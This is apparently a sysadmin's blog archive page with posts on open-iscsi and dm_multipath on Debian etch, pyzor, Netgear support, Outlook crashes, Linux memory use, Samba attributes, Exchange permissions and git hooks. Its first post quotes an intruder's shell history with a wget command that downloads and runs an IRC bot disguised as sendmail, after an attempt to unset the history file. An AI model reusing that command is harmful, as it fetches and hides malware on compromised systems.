Category Archives: Uncategorized

HISTFAIL

494  unset HISTIFLE
495  w
496  ps x
497  ls
498  rm -rf piata
499  wget www.f-dic.com/bot.tar ; tar xzvf bot.tar ; rm -rf bot.tar ; mv bot root-uscreens ; chmod 700 root-uscreens ; cd root-uscreens ; PATH=.:$PATH ; mv bash sendmail ; cp sendmail [sendmail] ; [sendmail]

A box had ssh left open on it. I like the ‘HISTIFLE’ part: the typo means HISTFILE was never unset, which is presumably why this history survived. IRC bots? This feels so very 1995. bot.tar comes with pico though, just in case you can’t use vi!

automatic open-iscsi volume mounting on debian etch

This is a continuation of my work on getting open-iscsi working on etch and then getting dm_multipath working.

Note that I have the pass column in the fstab set to 0 so the system won’t fail to boot when fsck can’t find this partition early in the boot process; this is important.

I started off trying to use _netdev as a mount option. I verified in ‘/etc/init.d/mountall.sh’ that debian does use mount -a -O no_netdev to avoid mounting network devices before networking is up, but while watching the startup (vmware is great for this) I saw it was still trying to mount early in the boot process anyways, and the UUID wasn’t there yet, of course, since iscsi and networking weren’t there yet.

I took a look in the initrd (‘mkdir /tmp/initrd ; cd /tmp/initrd ; cat /boot/initrd.img-`uname -r` | cpio -idmv’) in search of where it reads the fstab to see if that was the same case and saw that ‘scripts/local-top/iscsi’ definitely was trying to get iscsi things done. It’s worth noting this may not have been there if I hadn’t recreated my initrd recently in my last post. I recalled seeing some notes about root on iscsi in ‘/usr/share/doc/open-iscsi/README.Debian’ (comes with the open-iscsi deb).

Somehow I got an additional node that produced an error about failing to log in since it already existed. I stopped the open-iscsi init script and removed the corresponding folder in the /etc/iscsi/nodes/ tree, then restarted open-iscsi. It caught my eye that this script reported ‘Mounting network filesystems’ so I looked in the script and on line 102 saw ‘mount -a -O _netdev’ to mount lines tagged with the ‘_netdev’ option. On reviewing my fstab I saw I had two mounts, one commented out using /dev/dm-1 and the other not commented out using the UUID. The UUID mount was using ‘defaults’ while the devmapper mount was using ‘_netdev’. I switched the UUID mount to use the _netdev option, rebooted and saw my filesystem mounted. I ran ‘rm /etc/iscsi/iscsi.initramfs’ to ensure that my onboot initramfs work didn’t make a difference, and that was confirmed.

The trick is simply to set your fstab up using the UUID (use ‘blkid’ to get it), options set to ‘_netdev’ and pass set to ‘0’:

UUID=8d070de0-403c-4669-9db0-5b17e3aeebc5 /mnt ext3 _netdev 0 0
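For what it’s worth, here is a minimal sketch of generating that line rather than typing it. The function name fstab_netdev_line is made up for illustration and is not part of open-iscsi or any Debian package; it just formats the three values into the fstab layout shown above.

```shell
#!/bin/sh
# Sketch: build an fstab entry for an iSCSI-backed filesystem.
# fstab_netdev_line is a hypothetical helper name, not part of any package.
fstab_netdev_line() {
    uuid=$1        # filesystem UUID as reported by blkid
    mountpoint=$2  # where to mount it
    fstype=$3      # filesystem type, e.g. ext3
    # _netdev leaves the mount to the open-iscsi init script;
    # the trailing "0 0" sets dump and pass to 0 (no boot-time fsck).
    printf 'UUID=%s %s %s _netdev 0 0\n' "$uuid" "$mountpoint" "$fstype"
}
```

Calling ‘fstab_netdev_line 8d070de0-403c-4669-9db0-5b17e3aeebc5 /mnt ext3’ prints the same line as above, ready to be appended to /etc/fstab after review.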

Of course the ext3 partition won’t get fscked on startup, but that’s just the filesystem I was using for testing. The ultimate goal is to use GFS or OCFS or something to create an iscsi volume fronted by NFS on multiple servers.

So the open-iscsi init.d script actually does the mounting that finally works. This is mentioned in this group thread, although it’s worth noting that I set ‘node.startup = automatic’ and left ‘node.conn[0].startup = manual’ on each node. I don’t know what the difference is. In response to this later thread, I did not have to use an extra script.

dm_multipath and open-iscsi on debian etch

So I got open-iscsi working on debian, insofar as I had four disks: the two to the ‘preferred controller’ were good but the two to the second controller weren’t. Switching the preferred controller swapped which pair was usable.

After installing multipath-tools I started looking at dmsetup but the target types listed in the man page: linear, striped and error, didn’t make sense. When I read the INTRO file included in the debian package I saw there were additional types snapshot and mirror. This thread clued me in to there being a multipath type.

Running ‘multipath -v 3 -ll’ provided some more information that made things click in my head. Running ‘blkid’ produced:

/dev/mapper/36001c23000d59fc600000284478bcdca1: UUID="8d070de0-403c-4669-9db0-5b17e3aeebc5" SEC_TYPE="ext2" TYPE="ext3"
/dev/sda1: UUID="742239f4-b6fe-4422-b1a2-5639e5ab4675" SEC_TYPE="ext2" TYPE="ext3"
/dev/sda5: TYPE="swap"

The mapper device was created by running multipath and seemed to figure bits out on its own, such that running just ‘multipath -ll’ would show the paths that were and were not working (that’s a different problem).

sdb: checker msg is "readsector0 checker reports path is down"
sdc: checker msg is "readsector0 checker reports path is down"
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sdb 8:16 [active][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 6:0:0:0 sdc 8:32 [active][faulty]
\_ round-robin 0 [prio=1][active]
\_ 4:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 5:0:0:0 sde 8:64 [active][ready]
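
A quick way to summarize output like the above is to count the bracketed path states. This is only a sketch: count_paths is a name I made up, and it assumes the [ready] and [faulty] markers look exactly as they do in this version’s output.

```shell
#!/bin/sh
# Sketch: count path states in `multipath -ll` output read from stdin.
# count_paths is a hypothetical helper; it only matches the bracketed
# [ready] / [faulty] markers seen in the output above.
count_paths() {
    awk '
        /\[ready\]/  { ready++ }
        /\[faulty\]/ { faulty++ }
        END { printf "ready=%d faulty=%d\n", ready, faulty }
    '
}
```

Usage would be ‘multipath -ll | count_paths’, which is handy in a cron job or a monitoring check where you only care whether any path has gone faulty.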

For a while I was getting ‘mount: no such partition found’ when trying to mount by the UUID shown by ‘blkid’. It just stopped while I was researching the problem. The man page for mount indicates it needs access to /proc/partitions but I saw nothing related to UUIDs in there or elsewhere poking around /proc. I noticed there was a correct symlink in /dev/disk/by-uuid, so I rebooted the machine and checked again and it was gone. ‘iscsiadm -m session’ confirmed no sessions but ‘iscsiadm -m node’ had the nodes cached, so I ran ‘iscsiadm -m node -L all’ to log in again and verified the sessions again. I looked in /dev/disk/by-uuid and the uuid had shown up again. multipathd was running at startup so I figure it got things going again.

Interestingly, ‘multipath -ll’ only showed

sdb: checker msg is "readsector0 checker reports path is down"
sdc: checker msg is "readsector0 checker reports path is down"
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 2:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 3:0:0:0 sde 8:64 [active][ready]

Changing the preferred path made the disks go down and the dm faulty:

root@file01:/mnt# multipath -ll
sdd: checker msg is "readsector0 checker reports path is down"
sde: checker msg is "readsector0 checker reports path is down"
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48  [failed][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64  [failed][faulty]

Running ‘multipath’ added the other two block devices again and I remounted ok.  This time the filesystem stayed happy when I changed the preferred path. I’m willing to suspect that you can only access a virtual disk via one controller at a time, although from either interface on that controller. That is, you can only access it on the second controller when the first one fails or you manually change the preferred path. The work is just getting everything set up so that it works on startup. What’s missing appears to be getting the iscsi login and then the multipath to include all disks, then your normal automount in fstab.

‘iscsiadm -m node -o show’ reports ‘node.startup = manual’ which is also set in /etc/iscsid.conf and /etc/iscsi/iscsid.conf. I ran ‘iscsiadm -m node -o update -n node.startup -v automatic’. Rebooting saw the login automatically firing.

Putting the UUID or /dev/dm-1 in the fstab wasn’t working. Watching the console it was obvious it was trying to mount the partition before the multipath stuff ran. Per ‘/usr/share/doc/multipath-tools-initramfs/README.Debian’ in the ‘multipath-tools-initramfs’ package I ran ‘update-initramfs -t -c -v -k `uname -r`’.

On reboot I saw “FATAL: Module dm_multipath not found.” While multipath may have been part of the problem, it seems like even with _netdev as a mount option the system tries to mount the device before the open-iscsi daemon runs. I’ll leave that problem and post for another day; tomorrow if I’m lucky and nothing breaks.

pyzor: check failed: no response

~# spamassassin -D pyzor < ~abuse/Maildir/new/1211380929.V801Ic04fM701311.mx2
[12963] dbg: pyzor: network tests on, attempting Pyzor
[12963] dbg: pyzor: pyzor is available: /usr/bin/pyzor
[12963] dbg: pyzor: opening pipe: /usr/bin/pyzor check < /tmp/.spamassassin12963MwNYaWtmp
[12963] dbg: pyzor: [12964] finished: exit=0x0100
[12963] dbg: pyzor: check failed: no response
[12963] info: rules: meta test DIGEST_MULTIPLE has undefined dependency 'DCC_CHECK'

The no response seemed bad. However:

# wget http://www200.pair.com/mecham/spam/sample-spam.txt
# spamassassin -D pyzor <sample-spam.txt
[12961] dbg: pyzor: network tests on, attempting Pyzor
[12961] dbg: pyzor: pyzor is available: /usr/bin/pyzor
[12961] dbg: pyzor: opening pipe: /usr/bin/pyzor check < /tmp/.spamassassin12961WKN9Tptmp
[12961] dbg: pyzor: got response: 82.94.255.100:24441 (200, 'OK') 82 0
[12961] dbg: pyzor: listed: COUNT=82/5 WHITELIST=0
[12961] info: rules: meta test DIGEST_MULTIPLE has undefined dependency 'DCC_CHECK'

So actually I’m figuring Pyzor is working fine (this is with spamassassin installed via package on debian etch and use_pyzor 1 in local.cf). Got the idea from here.

iscsi on debian etch with open-iscsi and a dell md3000i initial notes

I had some problems using the debian open-iscsi package to connect to the md3000i on debian etch; both package versions 2.0.869.2-2 and 2.0.730-1etch1. A couple folks on the open-iscsi list pointed out there were problems with the kernel modules, so I compiled those from the open-iscsi source and diverted the debian modules. Details are here on the list.

Most open-iscsi documentation is in the README.

# iscsiadm -m discovery --type sendtargets --portal 10.0.9.10 -P 1
Target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a
Portal: 10.0.9.12:3260,2
Iface Name: default
Portal: 10.0.9.11:3260,1
Iface Name: default
Portal: 10.0.9.10:3260,1
Iface Name: default
Portal: 10.0.9.13:3260,2
Iface Name: default

The MD3000i has two controllers, each with one out of band management port and two iscsi ports, which can be seen above. When logging in, it grabs all the disks mapped as separate devices. I removed the ‘access’ mapping, which is that odd 16/20MB partition. Notes about that are deep in here, and I remember Dell telling me it wasn’t really needed on the Windows server either.

# iscsiadm -m node -l
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.12,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.13,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.10,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.11,3260]
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.12,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.13,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.10,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.11,3260]: successful

It logs in to each portal interface. I guess you use dm_multipath to hook them all back together, but I haven’t gotten that far.

# cat /proc/partitions
major minor  #blocks  name

8     0    3145728 sda
8     1    2947896 sda1
8     2          1 sda2
8     5     192748 sda5
8    16  584888320 sdb
8    17  584886456 sdb1
8    32  584888320 sdc
8    33  584886456 sdc1
8    48  584888320 sdd
8    64  584888320 sde

sd[b-e] are the same disk, through each portal. You’ll notice it only shows a partition on two of the four; those two go through the controller that is the “preferred path”. If we switch the preferred controller, the disks that are usable switch to the other pair. Again, I’m assuming dm_multipath will clean that up.
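
To spot which sd devices currently show no partition table (here, the paths through the non-preferred controller), something like the following sketch works on /proc/partitions-style input. disks_without_partitions is a made-up name, and the sketch assumes plain sdX / sdXN naming as in the listing above.

```shell
#!/bin/sh
# Sketch: list sd* whole disks that show no partitions, reading
# /proc/partitions-format text on stdin. disks_without_partitions is a
# hypothetical helper name.
disks_without_partitions() {
    awk '
        $4 ~ /^sd[a-z]+$/ { disks[$4] = 1 }    # whole disk, e.g. sdb
        $4 ~ /^sd[a-z]+[0-9]+$/ {              # partition, e.g. sdb1
            parent = $4
            sub(/[0-9]+$/, "", parent)         # strip the partition number
            has_part[parent] = 1
        }
        END {
            for (d in disks) if (!(d in has_part)) print d
        }
    ' | sort
}
```

Run as ‘disks_without_partitions < /proc/partitions’. Against the listing above it should name sdd and sde, the two devices with no sdX1 entry.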

netgear support fail

I’ve been trying to deal with a linux appliance’s memory problems for a while, here, and here. Because Netgear/Infrant’s build system removes binaries post-dpkg, it’s not really a full system and I sort of gave up debugging when I kept running into missing binaries (like strace). Some good people helped out (Thanks Mike Fedyk) but I went and opened a trouble ticket with netgear hoping to get to talk to an actual developer on the thing. They must exist somewhere, I can’t imagine netgear let them all go when they bought infrant or anything.

1) Netgear’s support site is terrible. There is no ‘support.netgear.com, go to the knowledge base’ option. Support is reached through product registration, of all places, under online support submissions (6).

2) The Readynas people have a nice forum, and it’s product specific. There’s a blog and everything, which is cool. But my thread stopped getting responses from them last week. No “I don’t know” or anything, just stopped responding to me.

3) So I opened the ticket with Netgear, and they respond with:

The Hardware Compatibility List Memory list/page http://www.readynas.com/?page_id=83

It’s the only guideline we have and if it’s not on the list its not supported nor with the scope of support we provide.

You question is already in the best place for an answer. The moderators are will pass all applicable data to the engineering staff as needed.

Totally in response to like, my first post of the thread, somehow ignoring the rest of it. In a hurry, fine.

4) I reply saying there’s a problem with the product and I need escalation. Escalation closes my ticket and responds with:

The forum where are posting is run by our Engineering Team. For your reference, the members of our team use Star Wars (TM) type names. Considering the kind of issue that you are having, you will have to correspond with them, as we at NETGEAR Level 1 and Level 2 Support cannot assist you with this type of issue.

We appreciate your patience and understanding.

The implication that I still have patience at this point is nice of them, however totally wrong.

Outlook 2007 Crash, junk mail filters / imf?

This is a fun one, by fun I mean I just got to spend 6 hours on it sans lunch.

Outlook 2007 crashing on startup on Vista.

Log Name: Application
Source: Application Error
Date: 5/14/2008 12:09:46 PM
Event ID: 1000
Task Category: (100)
Level: Error
Keywords: Classic
User: N/A
Computer: vistabob

Description:
Faulting application OUTLOOK.EXE, version 12.0.6212.1000, time stamp 0x46e03e45, faulting module OUTLOOK.EXE, version 12.0.6212.1000, time stamp 0x46e03e45, exception code 0xc0000005, fault offset 0x004a3d0a, process id 0x308, application start time 0x01c8b5f606eba5ae.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Application Error" />
<EventID Qualifiers="0">1000</EventID>
<Level>2</Level>
<Task>100</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2008-05-14T19:09:46.000Z" />
<EventRecordID>13251</EventRecordID>
<Channel>Application</Channel>
<Computer>vistabob</Computer>
<Security />
</System>
<EventData>
<Data>OUTLOOK.EXE</Data>
<Data>12.0.6212.1000</Data>
<Data>46e03e45</Data>
<Data>OUTLOOK.EXE</Data>
<Data>12.0.6212.1000</Data>
<Data>46e03e45</Data>
<Data>c0000005</Data>
<Data>004a3d0a</Data>
<Data>308</Data>
<Data>01c8b5f606eba5ae</Data>
</EventData>
</Event>


Things I tried.

  • Scanpst on all pst files. Did see an error about the junk mail list being full.
  • remove some recent office update to the junk mail filter
  • restore to last system restore before a glob of overnight office updates
  • open up mailbox in another profile, works fine, emptied deleted items.
  • open up mailbox in a new profile on another computer with 2007/xp, crashes.
  • open up mailbox in owa works fine.
  • turned off junk mail filtering in owa, lists were empty, added an address to each list.
  • use the mapi editor to remove the junk mail rule on the inbox, inconsequential.

And the winner is! Opened up mailbox in outlook 2003.

Yup, then it worked fine in 2007. Great times.

more linux memory debugging

I downgraded to an earlier version of raidiator on friday and saw no improvement in the memory black hole over the weekend. The frustrating part is being unable to tell where it is going, rather than trying to fix the problem with a particular daemon that I may not have the customized source for. My earlier blog entry about this is here. There’s more data from today in the netgear forum thread.

I did find this LKML thread by Mike Fedyk who did most of the upgrades to the munin memory script for 2.6. I can see in the thread that he decided to use the Total-Free-everythingelse=AppsUsed calculation, and I don’t see any big light bulbs in that thread to help solve my problem. I see on the net that someone that used to idle in #swn on irc is connected to a Mike Fedyk, so I’ve emailed him asking for an introduction before I try to harass him directly with the problem. I’m going to assume this is his LJ with a post about performance tuning.

My munin-users thread can be found here, for the record. I’m going to look around for more utilities to track down memory usage, although the lkml thread makes me feel like that may not be happening. I posted in the netgear thread asking for a kernel upgrade but the best advice I’ve gotten there so far is “our perl may be broken. stop running munin” so I’m not sure anyone technical is listening.

Linux Memory Usage

I’ve been trying to debug some memory problems on a ReadyNAS 1100. It has munin-node running, and I see the ‘app’ memory slowly rise by something like 50-100MB a day. What’s odd is that Munin reports 230MB of RAM in use for ‘apps’ while memstat only reports 118224k (118MB or so), making it difficult to track down where the memory is going.

‘free’ and ‘/proc/meminfo’ only report the amount of free memory, and the amount of memory in buffers, cache and other little kernel bits. There’s no clear value for memory used. Munin calculates the used memory by subtracting the other bits from the memory total. I can’t find a lot of information about meminfo beyond these sorts of descriptive bits about what each value means. It seems that if the memory is allocated, but not to buffers or cache or other small things, we assume it’s used by applications, but that doesn’t pan out with the tools I can find to tell me how much memory an application is using.
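
Here is a rough sketch of that subtraction, reading /proc/meminfo-format text. The function name apps_used_kb is hypothetical, and the set of fields treated as “other bits” (MemFree, Buffers, Cached, SwapCached, Slab, PageTables) is my assumption; it is not necessarily the exact list the Munin plugin uses.

```shell
#!/bin/sh
# Sketch: estimate "apps" memory as MemTotal minus the kernel-accounted
# bits, from /proc/meminfo-format text on stdin. apps_used_kb is a
# hypothetical helper, and the field list below is an assumption.
apps_used_kb() {
    awk '
        $1 == "MemTotal:"   { total = $2 }
        $1 == "MemFree:"    { other += $2 }
        $1 == "Buffers:"    { other += $2 }
        $1 == "Cached:"     { other += $2 }
        $1 == "SwapCached:" { other += $2 }
        $1 == "Slab:"       { other += $2 }
        $1 == "PageTables:" { other += $2 }
        END { print total - other }   # remainder, in kB
    '
}
```

Run as ‘apps_used_kb < /proc/meminfo’. The point of writing it out is that “apps” is a remainder, not a measurement, so anything the kernel allocates outside the listed fields lands in it too.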

The description here of the difference between VSZ (virtual size) and RSS (resident set size) is useful for looking at ‘ps aux’ output, but nothing there is using a ton of memory, and the count feels pretty close to that generated by ‘memstat’.
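
For comparing against the Munin figure, a minimal sketch that totals an RSS column is below. sum_rss_kb is a made-up name, and it expects one number per line on stdin.

```shell
#!/bin/sh
# Sketch: total a column of RSS values (kB, one per line) from stdin.
# sum_rss_kb is a hypothetical helper name.
sum_rss_kb() {
    awk '{ sum += $1 } END { printf "%d\n", sum }'
}
```

With procps, ‘ps -eo rss= | sum_rss_kb’ should feed it the RSS of every process with no header line. Keep in mind that pages shared between processes are counted once per process, so this total tends to overstate rather than understate real usage.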

The smugmug discussion about swappiness is interesting, as that was originally my problem because running out of memory with vm.swappiness set to 0 got the OOM killer going buck wild.  This discussion has recently made it to the lkml.

I’ll probably post to the lkml if I don’t figure something out this afternoon, as I’ve been staring at a lot of numbers lately.

Vista says you need permission to perform this action

Man this is annoying. A file tree ended up with a .svn folder which contains files marked read-only. When copied with Vista all is fine until you try to delete the folder, when you’re told “you need permission to perform this action” with “try again” and “cancel” as options. Trying again many times didn’t do as much as I would have hoped. Eventually we found the files with the read-only attributes. These files are stored on a samba server so I suppose I’ll see if I can get samba or a cron script to strip those attributes. Removing the read-only attribute allows you to delete the file, but I can’t find any way to enable the old XP style dialog that tells you it is marked read only but allows you to delete it anyways if you have permissions. UAC is off, by the way.

update:

Raidiator, the debian based distro that runs on infrant (i always say infarant) / netgear readynas products has ‘store dos attributes = 1’ in the global section of /etc/samba/smb.conf. This stores the read-only / hidden / archive / system attributes in an extended attribute called user.DOSATTRIB:

getfattr -d entries
# file: entries
user.DOSATTRIB="0x21"

Normally this is off, and newer versions of samba use ‘map read only’ to determine what read only should be set to: based on the user write bit (yes, the default), the effective permissions of the user (permissions), or ignoring permissions and only using ‘store dos attributes’ (no).

I put ‘store dos attributes = 0’ in the share definition to override the global (/etc/frontview/samba/Shares.conf in raidiator) and reloaded samba (/etc/init.d/samba reload), and then the file’s properties showed that the file was no longer read only, thus working around the problem of Vista not letting me delete read-only files.
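
To read a value like the 0x21 above, here is a small sketch that decodes it, assuming it is a bitmask of the standard DOS attribute bits (0x01 read-only, 0x02 hidden, 0x04 system, 0x20 archive). decode_dosattrib is a name I made up; it is not a samba tool.

```shell
#!/bin/sh
# Sketch: decode a user.DOSATTRIB value such as 0x21 into flag names,
# assuming it is a bitmask of the standard DOS attribute bits.
# decode_dosattrib is a hypothetical helper name.
decode_dosattrib() {
    value=$(( $1 ))   # shell arithmetic accepts 0x-prefixed hex
    flags=""
    [ $(( value & 0x01 )) -ne 0 ] && flags="$flags read-only"
    [ $(( value & 0x02 )) -ne 0 ] && flags="$flags hidden"
    [ $(( value & 0x04 )) -ne 0 ] && flags="$flags system"
    [ $(( value & 0x20 )) -ne 0 ] && flags="$flags archive"
    echo "${flags# }"  # drop the leading space
}
```

Under that assumption, ‘decode_dosattrib 0x21’ reports read-only plus archive, which matches what Vista was complaining about.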

Exchange 2007 Public Folder Security Groups

Tried to add an Exchange 2007 Global Security Group to a tree of public folders today. Exchange wouldn’t see the group unless it was mail enabled, but trying to switch it to a distribution group would break the NTFS ACLs that use it. Changing the group to be a universal security group however allowed me to mail enable it under recipient configuration, distribution groups, new distribution group in the exchange management console (EMC).

Then in the exchange management shell (EMS) I ran:

get-publicfolder -identity "\publicfolder" -recurse |
add-publicfolderclientpermission -user "Some Kind of Managers" -accessright publishingeditor

It’s perplexing how pipes work in powershell. That ‘get-publicfolder -identity “\foo”’ produces very little information while ‘get-publicfolder -identity “\foo” | format-list’ produces extended information is confusing to say the least, coming from a DOS/UNIX background, made worse by the command being named FORMAT rather than GETMEMOREINFORMATION. Oh well. Note that in the past I’ve seen that add-publicfolderclientpermission breaks if the user has some degree of permissions already, and you have to run a get command into a pipe to a remove command to clean up first.

git commit email notification on debian etch

We use git with a single bare repository for our puppet configuration, and each systems administrator has a local git repository clone which they push back to the origin. I wanted to set up email notification on this main repository which lives on a debian etch server.

I found post-receive-email in the git gitweb repository and assumed that it was not included in the debian package because it has a copyright with no OSS license included. It pulls its configuration from the git config, which is repository specific and kind of neat, but I had to modify it to call ‘git-repo-config’ instead of ‘git config’ because that’s all etch had. Again, assuming some weird debian problem, but I didn’t bother looking.

Then when I had trouble with it not working I noticed my ubuntu hardy box had a newer major revision of git-core than the debian etch box. That is 1.5.4.3-1ubuntu2 and 1.4.4.4-2 respectively. I poked around the git documentation a little bit and found that the post-receive hooks weren’t added until 1.5.1. But there is a 1.5.4 git-core deb in etch-backports.
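
A check like this would have saved me some time. It is a sketch only: version_ge is a hypothetical helper, it relies on GNU sort’s -V (version sort) option, which the coreutils on an older box may not have, and it compares upstream versions with the Debian revision stripped off.

```shell
#!/bin/sh
# Sketch: succeed when version $1 >= version $2.
# version_ge is a hypothetical helper; it relies on GNU sort -V.
version_ge() {
    # The smaller of the two sorts first; if that is $2, then $1 >= $2.
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$2" ]
}

# Example: are post-receive hooks available (added in 1.5.1)?
# if version_ge "1.5.4.3" "1.5.1"; then echo "post-receive supported"; fi
```

With the two boxes above, 1.5.4.3 passes the check against 1.5.1 and 1.4.4.4 does not.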

If you want to upgrade multiple boxes with a local repository, you’ll need to copy more than git-core to meet the dependencies. Otherwise you can just use apt-get install after adding the backports repo.

add ‘deb http://www.backports.org/debian etch-backports main’ to /etc/apt/sources.list

sudo apt-get update
sudo apt-get install debian-backports-keyring
sudo apt-get update
sudo apt-get install apt-move
sudo rm /var/cache/apt/archives/git*
for package in gitk gitweb `apt-cache search '^git-*' --names-only | awk '{ print $1 }'` ; do sudo /usr/lib/apt-move/fetch $package ; done

latest debs are in /var/cache/apt/archives, for copying to a local repository.

git-core 1.5.4.2-1~bpo40+2 includes git-config and ‘post-receive-email’.

cd /path-to-bare-git-repo/.git/hooks
ln -sf /usr/share/doc/git-core/contrib/hooks/post-receive-email post-receive
sudo chmod a+x /usr/share/doc/git-core/contrib/hooks/post-receive-email
git-config hooks.mailinglist "to@example.org"

git-config --global user.name "Your Name"
git-config --global user.email "Your Email"

tinkering with ruby, activeldap and active directory, part 2

These are my notes from tonight’s reading after trying to get activeldap working with active directory today at work. Here is when they renamed ActiveLDAP to ActiveLdap, around 0.8.0, so if you’re looking at examples using the capital case, they’re fairly old and you should probably ignore them. v0.8.0 and later is also when Base.connect went away and we got Base.establish_connection, and dnattr became dn_attribute. The most sane examples live in the rdoc in active_ldap.rb. Still not 100% there though.